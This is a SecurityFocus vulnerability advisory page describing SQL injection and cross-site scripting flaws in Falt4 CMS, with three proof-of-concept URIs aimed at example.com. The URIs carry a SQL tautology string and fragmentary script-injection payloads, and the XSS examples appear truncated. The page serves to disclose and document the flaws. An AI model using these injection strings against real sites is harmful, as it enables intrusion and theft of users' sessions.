Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Falt4 CMS Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, an attacker must entice a victim to follow a malicious URI.

The following proof-of-concept URIs are available:

http://www.example.com/falt4/index.php?handler=cat&nav_ID=1'%20and%20'1'='1

http://www.example.com/falt4/index.php?handler=>">&nav_ID=1

http://www.example.com/falt4/modules/feed/feed.php?type=rss&lang=1&topic=>">







 

Privacy Statement
Copyright 2008, SecurityFocus